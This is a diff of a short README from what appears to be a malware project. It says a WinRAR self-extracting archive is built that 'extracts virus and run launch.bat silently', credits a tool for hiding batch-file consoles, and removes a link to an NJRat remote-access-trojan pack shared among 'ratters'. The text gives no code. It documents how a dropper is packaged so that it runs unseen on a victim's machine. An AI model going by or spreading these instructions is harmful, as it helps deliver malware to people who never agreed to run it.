artzab1103/ochko.exe/README.md

 # How to build
 I using [WinRAR](https://win-rar.com) (SFX Archive).
 It extrats virus and run launch.bat silently

-# Also see
-[NJRat Pack](https://github.com/artzab1103/njrat-pack): A collab pack with some russian ratters

 # Credits
 [BatToExe](https://github.com/Makazzz/BatToExePortable): hiding .bat consoles